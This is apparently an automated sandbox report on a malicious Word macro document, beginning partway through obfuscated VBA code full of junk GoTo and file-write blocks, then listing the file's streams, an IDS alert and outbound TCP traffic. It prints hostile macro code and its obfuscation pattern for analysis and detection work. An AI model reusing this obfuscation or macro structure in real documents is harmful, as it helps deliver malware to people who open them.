                                                                                                                              Tbkimf15gklpyjuc5.Create Us5rvv097omc6(U4fasjmuqzl8g4y9), Xzrkngu1iuo6rwg, Np29qma1fg5ke
                                                                                                                                 GoTo pxMXSJrIc
                                                                                                                              Dim JzcNByvAX As String
                                                                                                                              Open "dCIAJyHr.uGSFGCFE.hgENI" For Binary As 133
                                                                                                                              Put #133, , JzcNByvAX
                                                                                                                              Close #133
                                                                                                                              pxMXSJrIc:
                                                                                                                              GoTo NwlcQEELI
                                                                                                                              Dim BrrXfI As String
                                                                                                                              Open "gEMlED.skZhEggk.ZyWBD" For Binary As 239
                                                                                                                              Put #239, , BrrXfI
                                                                                                                              Close #239
                                                                                                                              NwlcQEELI:
                                                                                                                              GoTo ZxZNGGUBd
                                                                                                                              Dim CtmaxWDYG As String
                                                                                                                              Open "bfJqAKr.cLEdAF.oYWiAFEQ" For Binary As 143
                                                                                                                              Put #143, , CtmaxWDYG
                                                                                                                              Close #143
                                                                                                                              ZxZNGGUBd:
                                                                                                                                 GoTo IIJMEYBZ
                                                                                                                              Dim ohdoz As String
                                                                                                                              Open "eHqqE.nCeMDET.kZWuQGE" For Binary As 147
                                                                                                                              Put #147, , ohdoz
                                                                                                                              Close #147
                                                                                                                              IIJMEYBZ:
                                                                                                                              GoTo aDFRF
                                                                                                                              Dim TLfxGCa As String
                                                                                                                              Open "hSzhx.onZqBBzG.aRYCE" For Binary As 269
                                                                                                                              Put #269, , TLfxGCa
                                                                                                                              Close #269
                                                                                                                              aDFRF:
                                                                                                                              GoTo zHYrT
                                                                                                                              Dim QqQRUOBIy As String
                                                                                                                              Open "BiUfo.vtUVwAWGC.hUSLqGGIO" For Binary As 194
                                                                                                                              Put #194, , QqQRUOBIy
                                                                                                                              Close #194
                                                                                                                              zHYrT:
                                                                                                                              End Function
                                                                                                                              Function Us5rvv097omc6(Wj34bkji64gbgi_p)
                                                                                                                              On Error Resume Next
                                                                                                                                 GoTo RMyrFd
                                                                                                                              Dim uJtiAP As String
                                                                                                                              Open "CXrJJB.OBfnW.uqEngDYV" For Binary As 206
                                                                                                                              Put #206, , uJtiAP
                                                                                                                              Close #206
                                                                                                                              RMyrFd:
                                                                                                                              GoTo ZqNrvaa
                                                                                                                              Dim dThRBEAv As String
                                                                                                                              Open "HGXMmlZoZ.jEXaTVE.zeocvMGG" For Binary As 207
                                                                                                                              Put #207, , dThRBEAv
                                                                                                                              Close #207
                                                                                                                              ZqNrvaa:
                                                                                                                              GoTo kMzKEr
                                                                                                                              Dim ahjNCC As String
                                                                                                                              Open "ZFWwdLJFE.FcQNSnyB.yuKyrJAD" For Binary As 93
                                                                                                                              Put #93, , ahjNCC
                                                                                                                              Close #93
                                                                                                                              kMzKEr:
                                                                                                                              Dbzgu9yuthixkrcjt = (Wj34bkji64gbgi_p)
                                                                                                                                 GoTo JXblRBK
                                                                                                                              Dim sCwjljF As String
                                                                                                                              Open "obWgmFILu.KLSrfFHDI.nylpN" For Binary As 185
                                                                                                                              Put #185, , sCwjljF
                                                                                                                              Close #185
                                                                                                                              JXblRBK:
                                                                                                                              GoTo uJknJZHFB
                                                                                                                              Dim WpdDxhHa As String
                                                                                                                              Open "DcfnrACC.XeVEC.QdSVCUJ" For Binary As 245
                                                                                                                              Put #245, , WpdDxhHa
                                                                                                                              Close #245
                                                                                                                              uJknJZHFB:
                                                                                                                              GoTo nCWvB
                                                                                                                              Dim NJlsEIS As String
                                                                                                                              Open "nYskWX.aOSpmAFIB.kCBksCD" For Binary As 209
                                                                                                                              Put #209, , NJlsEIS
                                                                                                                              Close #209
                                                                                                                              nCWvB:
                                                                                                                              Znr2e9ewo0wtxy = Gdxyahu7r2bnouqu(Dbzgu9yuthixkrcjt)
                                                                                                                                 GoTo gvnNjywC
                                                                                                                              Dim RWlYF As String
                                                                                                                              Open "cfmqZH.yHFfXEyD.iUezXEC" For Binary As 124
                                                                                                                              Put #124, , RWlYF
                                                                                                                              Close #124
                                                                                                                              gvnNjywC:
                                                                                                                              GoTo IpXGAFACy
                                                                                                                              Dim WnWcBBeF As String
                                                                                                                              Open "dcEwJD.cZCpC.kfXrIC" For Binary As 137
                                                                                                                              Put #137, , WnWcBBeF
                                                                                                                              Close #137
                                                                                                                              IpXGAFACy:
                                                                                                                              GoTo ObUqEpuD
                                                                                                                              Dim uWAjsYwtG As String
                                                                                                                              Open "qKjdvEDq.lYfhW.eTVwADADD" For Binary As 100
                                                                                                                              Put #100, , uWAjsYwtG
                                                                                                                              Close #100
                                                                                                                              ObUqEpuD:
                                                                                                                              Us5rvv097omc6 = Znr2e9ewo0wtxy
                                                                                                                                 GoTo ZuuLFE
                                                                                                                              Dim IJSGH As String
                                                                                                                              Open "DbRqLDGCg.nxwYCaF.sZZrJ" For Binary As 168
                                                                                                                              Put #168, , IJSGH
                                                                                                                              Close #168
                                                                                                                              ZuuLFE:
                                                                                                                              GoTo LjVfJ
                                                                                                                              Dim DxojDGC As String
                                                                                                                              Open "nRpjIJ.tkIcCAbCF.hJzbH" For Binary As 65
                                                                                                                              Put #65, , DxojDGC
                                                                                                                              Close #65
                                                                                                                              LjVfJ:
                                                                                                                              GoTo KiOKSNEG
                                                                                                                              Dim JHGODJK As String
                                                                                                                              Open "gtvUAW.KeNGGlEDI.FCFXBEHbH" For Binary As 177
                                                                                                                              Put #177, , JHGODJK
                                                                                                                              Close #177
                                                                                                                              KiOKSNEG:
                                                                                                                              End Function
                                                                                                                              VBA File Name: UserForm1, Stream Size: 1160
                                                                                                                              General
                                                                                                                              Stream Path:Macros/VBA/UserForm1
                                                                                                                              VBA File Name:UserForm1
                                                                                                                              Stream Size:1160

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              VB_Exposed
                                                                                                                              Attribute
                                                                                                                              VB_Name
                                                                                                                              VB_Creatable
                                                                                                                              VB_PredeclaredId
                                                                                                                              VB_GlobalNameSpace
                                                                                                                              VB_Base
                                                                                                                              VB_Customizable
                                                                                                                              False
                                                                                                                              VB_TemplateDerived
                                                                                                                              VBA Code
                                                                                                                              Attribute VB_Name = "UserForm1"
                                                                                                                              Attribute VB_Base = "0{E4811F3D-9F01-4BC4-95D4-D40026D931D3}{41345D1C-9C4E-4385-B780-C54CCB7ABE17}"
                                                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                                                              Attribute VB_Creatable = False
                                                                                                                              Attribute VB_PredeclaredId = True
                                                                                                                              Attribute VB_Exposed = False
                                                                                                                              Attribute VB_TemplateDerived = False
                                                                                                                              Attribute VB_Customizable = False
                                                                                                                              VBA File Name: UserForm2, Stream Size: 1155
                                                                                                                              General
                                                                                                                              Stream Path:Macros/VBA/UserForm2
                                                                                                                              VBA File Name:UserForm2
                                                                                                                              Stream Size:1155

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              False
                                                                                                                              VB_Exposed
                                                                                                                              Attribute
                                                                                                                              VB_Name
                                                                                                                              VB_Creatable
                                                                                                                              VB_PredeclaredId
                                                                                                                              VB_GlobalNameSpace
                                                                                                                              VB_Base
                                                                                                                              VB_Customizable
                                                                                                                              VB_TemplateDerived
                                                                                                                              VBA Code
                                                                                                                              Attribute VB_Name = "UserForm2"
                                                                                                                              Attribute VB_Base = "0{AF4533AC-BBF6-4979-BA91-9D2D4959595A}{3CF58CA5-D4D4-49F7-BA7F-F124E45D0A17}"
                                                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                                                              Attribute VB_Creatable = False
                                                                                                                              Attribute VB_PredeclaredId = True
                                                                                                                              Attribute VB_Exposed = False
                                                                                                                              Attribute VB_TemplateDerived = False
                                                                                                                              Attribute VB_Customizable = False
                                                                                                                              VBA File Name: UserForm3, Stream Size: 1159
                                                                                                                              General
                                                                                                                              Stream Path:Macros/VBA/UserForm3
                                                                                                                              VBA File Name:UserForm3
                                                                                                                              Stream Size:1159

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              False
                                                                                                                              VB_Exposed
                                                                                                                              Attribute
                                                                                                                              VB_Name
                                                                                                                              VB_Creatable
                                                                                                                              VB_PredeclaredId
                                                                                                                              VB_Base
                                                                                                                              VB_Customizable
                                                                                                                              VB_TemplateDerived
                                                                                                                              VB_GlobalNameSpace
                                                                                                                              VBA Code
                                                                                                                              Attribute VB_Name = "UserForm3"
                                                                                                                              Attribute VB_Base = "0{A4835EEF-81F1-4677-BAA3-01DF6CF2C26F}{ADE6D7C4-3411-4730-A534-6D8AAFEFBA8F}"
                                                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                                                              Attribute VB_Creatable = False
                                                                                                                              Attribute VB_PredeclaredId = True
                                                                                                                              Attribute VB_Exposed = False
                                                                                                                              Attribute VB_TemplateDerived = False
                                                                                                                              Attribute VB_Customizable = False
                                                                                                                              VBA File Name: UserForm4, Stream Size: 1160
                                                                                                                              General
                                                                                                                              Stream Path:Macros/VBA/UserForm4
                                                                                                                              VBA File Name:UserForm4
                                                                                                                              Stream Size:1160

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              False
                                                                                                                              VB_Exposed
                                                                                                                              Attribute
                                                                                                                              VB_Name
                                                                                                                              VB_Creatable
                                                                                                                              VB_PredeclaredId
                                                                                                                              VB_GlobalNameSpace
                                                                                                                              VB_Customizable
                                                                                                                              VB_TemplateDerived
                                                                                                                              VB_Base
                                                                                                                              VBA Code
                                                                                                                              Attribute VB_Name = "UserForm4"
                                                                                                                              Attribute VB_Base = "0{4FA002EA-017C-4E93-9C6B-22A1ABC6E370}{C27736E2-CDA0-4100-9FCF-E22B5D354CA0}"
                                                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                                                              Attribute VB_Creatable = False
                                                                                                                              Attribute VB_PredeclaredId = True
                                                                                                                              Attribute VB_Exposed = False
                                                                                                                              Attribute VB_TemplateDerived = False
                                                                                                                              Attribute VB_Customizable = False
                                                                                                                              VBA File Name: UserForm5, Stream Size: 1160
                                                                                                                              General
                                                                                                                              Stream Path:Macros/VBA/UserForm5
                                                                                                                              VBA File Name:UserForm5
                                                                                                                              Stream Size:1160

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              False
                                                                                                                              VB_Exposed
                                                                                                                              Attribute
                                                                                                                              VB_Name
                                                                                                                              VB_Creatable
                                                                                                                              VB_PredeclaredId
                                                                                                                              VB_GlobalNameSpace
                                                                                                                              VB_Base
                                                                                                                              VB_Customizable
                                                                                                                              VB_TemplateDerived
                                                                                                                              VBA Code
                                                                                                                              Attribute VB_Name = "UserForm5"
                                                                                                                              Attribute VB_Base = "0{B4698655-398F-452C-B828-35D501CBBA3E}{6D1A2E80-5267-422A-B1BA-58F578BA8D71}"
                                                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                                                              Attribute VB_Creatable = False
                                                                                                                              Attribute VB_PredeclaredId = True
                                                                                                                              Attribute VB_Exposed = False
                                                                                                                              Attribute VB_TemplateDerived = False
                                                                                                                              Attribute VB_Customizable = False
                                                                                                                              VBA File Name: Vhr7vb1s1hgs, Stream Size: 681
                                                                                                                              General
                                                                                                                              Stream Path:Macros/VBA/Vhr7vb1s1hgs
                                                                                                                              VBA File Name:Vhr7vb1s1hgs
                                                                                                                              Stream Size:681

                                                                                                                              VBA Code Keywords

                                                                                                                              Keyword
                                                                                                                              Attribute
                                                                                                                              VB_Name
                                                                                                                              VBA Code
                                                                                                                              Attribute VB_Name = "Vhr7vb1s1hgs"

                                                                                                                              Streams

                                                                                                                              Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                                                                                              General
                                                                                                                              Stream Path:\x1CompObj
                                                                                                                              File Type:data
                                                                                                                              Stream Size:114
                                                                                                                              Entropy:4.2359563651
                                                                                                                              Base64 Encoded:True
                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
                                                                                                                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                              General
                                                                                                                              Stream Path:\x5DocumentSummaryInformation
                                                                                                                              File Type:data
                                                                                                                              Stream Size:4096
                                                                                                                              Entropy:0.252421588676
                                                                                                                              Base64 Encoded:False
                                                                                                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 496
                                                                                                                              General
                                                                                                                              Stream Path:\x5SummaryInformation
                                                                                                                              File Type:data
                                                                                                                              Stream Size:496
                                                                                                                              Entropy:3.89869601257
                                                                                                                              Base64 Encoded:False
                                                                                                                              Stream Path: 1Table, File Type: data, Stream Size: 7231
                                                                                                                              General
                                                                                                                              Stream Path:1Table
                                                                                                                              File Type:data
                                                                                                                              Stream Size:7231
                                                                                                                              Entropy:5.85333738879
                                                                                                                              Base64 Encoded:True
                                                                                                                              Stream Path: Data, File Type: data, Stream Size: 99195
                                                                                                                              General
                                                                                                                              Stream Path:Data
                                                                                                                              File Type:data
                                                                                                                              Stream Size:99195
                                                                                                                              Entropy:7.38970239713
                                                                                                                              Base64 Encoded:True
                                                                                                                              Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 894
                                                                                                                              General
                                                                                                                              Stream Path:Macros/PROJECT
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Stream Size:894
                                                                                                                              Entropy:5.30543445279
                                                                                                                              Base64 Encoded:True
                                                                                                                              Data ASCII:I D = " { 9 E 7 4 B F 6 0 - 7 1 9 9 - 4 B 1 2 - B 7 4 3 - 4 4 A 8 F B E E D 2 3 6 } " . . D o c u m e n t = D k 5 a t t 0 c u _ 9 j s b / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = U s e r F o r m 1 . . B a s e C l a s s = U s e r F o r m 2 . . B a s e C l a s s = U s e r F o r m 3 . . B a s e C l a s s = U s e r F o r m 4 . . B a s e C l a s s = U s e r F o r m 5 . . M o d u l e = L x v i n h y q 0 h u 0 i . .
                                                                                                                              Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 278
                                                                                                                              General
                                                                                                                              Stream Path:Macros/PROJECTwm
                                                                                                                              File Type:data
                                                                                                                              Stream Size:278
                                                                                                                              Entropy:3.75500935024
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:D k 5 a t t 0 c u _ 9 j s b . D . k . 5 . a . t . t . 0 . c . u . _ . 9 . j . s . b . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . U s e r F o r m 2 . U . s . e . r . F . o . r . m . 2 . . . U s e r F o r m 3 . U . s . e . r . F . o . r . m . 3 . . . U s e r F o r m 4 . U . s . e . r . F . o . r . m . 4 . . . U s e r F o r m 5 . U . s . e . r . F . o . r . m . 5 . . . L x v i n h y q 0 h u 0 i . L . x . v . i . n . h . y . q . 0 . h . u . 0 . i . . . V h r 7 v b 1 s 1 h g s . V . h . r .
                                                                                                                              Stream Path: Macros/UserForm1/\x1CompObj, File Type: data, Stream Size: 97
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm1/\x1CompObj
                                                                                                                              File Type:data
                                                                                                                              Stream Size:97
                                                                                                                              Entropy:3.61064918306
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                                                                                                              Stream Path: Macros/UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm1/\x3VBFrame
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Stream Size:266
                                                                                                                              Entropy:4.62034133633
                                                                                                                              Base64 Encoded:True
                                                                                                                              Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                                                                                                              Stream Path: Macros/UserForm1/f, File Type: data, Stream Size: 38
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm1/f
                                                                                                                              File Type:data
                                                                                                                              Stream Size:38
                                                                                                                              Entropy:1.54052096453
                                                                                                                              Base64 Encoded:False
                                                                                                                              Stream Path: Macros/UserForm1/o, File Type: empty, Stream Size: 0
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm1/o
                                                                                                                              File Type:empty
                                                                                                                              Stream Size:0
                                                                                                                              Entropy:0.0
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:
                                                                                                                              Data Raw:
                                                                                                                              Stream Path: Macros/UserForm2/\x1CompObj, File Type: data, Stream Size: 97
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm2/\x1CompObj
                                                                                                                              File Type:data
                                                                                                                              Stream Size:97
                                                                                                                              Entropy:3.61064918306
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                                                                                                              Stream Path: Macros/UserForm2/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm2/\x3VBFrame
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Stream Size:266
                                                                                                                              Entropy:4.62970308443
                                                                                                                              Base64 Encoded:True
                                                                                                                              Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 2 . . C a p t i o n = " U s e r F o r m 2 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                                                                                                              Stream Path: Macros/UserForm2/f, File Type: data, Stream Size: 38
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm2/f
                                                                                                                              File Type:data
                                                                                                                              Stream Size:38
                                                                                                                              Entropy:1.54052096453
                                                                                                                              Base64 Encoded:False
                                                                                                                              Stream Path: Macros/UserForm2/o, File Type: empty, Stream Size: 0
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm2/o
                                                                                                                              File Type:empty
                                                                                                                              Stream Size:0
                                                                                                                              Entropy:0.0
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:
                                                                                                                              Data Raw:
                                                                                                                              Stream Path: Macros/UserForm3/\x1CompObj, File Type: data, Stream Size: 97
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm3/\x1CompObj
                                                                                                                              File Type:data
                                                                                                                              Stream Size:97
                                                                                                                              Entropy:3.61064918306
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                                                                                                              Stream Path: Macros/UserForm3/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                                                                                                              Entropy:4.63438395848
                                                                                                                              Base64 Encoded:True
                                                                                                                              Stream Path: Macros/UserForm3/f, File Type: data, Stream Size: 38
                                                                                                                              Entropy:1.54052096453
                                                                                                                              Base64 Encoded:False
                                                                                                                              Stream Path: Macros/UserForm3/o, File Type: empty, Stream Size: 0
                                                                                                                              Entropy:0.0
                                                                                                                              Base64 Encoded:False
                                                                                                                              Stream Path: Macros/UserForm4/\x1CompObj, File Type: data, Stream Size: 97
                                                                                                                              Entropy:3.61064918306
                                                                                                                              Base64 Encoded:False
                                                                                                                              Stream Path: Macros/UserForm4/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                                                                                                              Entropy:4.62402723855
                                                                                                                              Base64 Encoded:True
                                                                                                                              Stream Path: Macros/UserForm4/f, File Type: data, Stream Size: 38
                                                                                                                              Entropy:1.54052096453
                                                                                                                              Base64 Encoded:False
                                                                                                                              Stream Path: Macros/UserForm4/o, File Type: empty, Stream Size: 0
                                                                                                                              Entropy:0.0
                                                                                                                              Base64 Encoded:False
                                                                                                                              Stream Path: Macros/UserForm5/\x1CompObj, File Type: data, Stream Size: 97
                                                                                                                              Entropy:3.61064918306
                                                                                                                              Base64 Encoded:False
                                                                                                                              Stream Path: Macros/UserForm5/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                                                                                                              Entropy:4.62202697924
                                                                                                                              Base64 Encoded:True
                                                                                                                              Stream Path: Macros/UserForm5/f, File Type: data, Stream Size: 38
                                                                                                                              Entropy:1.54052096453
                                                                                                                              Base64 Encoded:False
                                                                                                                              Stream Path: Macros/UserForm5/o, File Type: empty, Stream Size: 0
                                                                                                                              Entropy:0.0
                                                                                                                              Base64 Encoded:False
                                                                                                                              Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5949
                                                                                                                              Entropy:5.26993168344
                                                                                                                              Base64 Encoded:False
                                                                                                                              Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 1039
                                                                                                                              Entropy:6.60831708882
                                                                                                                              Base64 Encoded:True
                                                                                                                              Stream Path: WordDocument, File Type: data, Stream Size: 43108
                                                                                                                              Entropy:3.69797214633
                                                                                                                              Base64 Encoded:False

                                                                                                                              Network Behavior

                                                                                                                              Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
02/01/21-23:18:24.263263 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49169 | 70.32.23.44 | 192.168.2.22

                                                                                                                              Network Port Distribution

                                                                                                                              TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                              Feb 1, 2021 23:25:16.556180000 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.556206942 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.556235075 CET49742443192.168.2.4194.209.195.106
                                                                                                                              Feb 1, 2021 23:25:16.556243896 CET49742443192.168.2.4194.209.195.106
                                                                                                                              Feb 1, 2021 23:25:16.556257010 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.556524992 CET49742443192.168.2.4194.209.195.106
                                                                                                                              Feb 1, 2021 23:25:16.605983019 CET49742443192.168.2.4194.209.195.106
                                                                                                                              Feb 1, 2021 23:25:16.912554979 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.065234900 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.065489054 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.065936089 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.218677998 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.220899105 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.220958948 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.221002102 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.221103907 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.233995914 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.386765003 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.388068914 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.394598961 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.547605991 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.592668056 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.592698097 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.592715025 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.592751980 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.592784882 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.592812061 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.592839956 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.592868090 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.592899084 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.592926025 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.593077898 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.593157053 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.745815992 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.745874882 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.745932102 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.745985985 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746015072 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.746037006 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746067047 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.746088982 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746139050 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746156931 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.746190071 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746238947 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746248007 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.746289015 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746337891 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746356010 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.746387959 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746438026 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746486902 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746491909 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.746539116 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746562958 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.746591091 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746644974 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746651888 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.746696949 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746750116 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746758938 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.746800900 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746862888 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.899545908 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.899611950 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.899663925 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.899713039 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.899740934 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.899790049 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.899797916 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.899878979 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.899940014 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.899970055 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.900006056 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.900065899 CET4434974435.208.182.43192.168.2.4
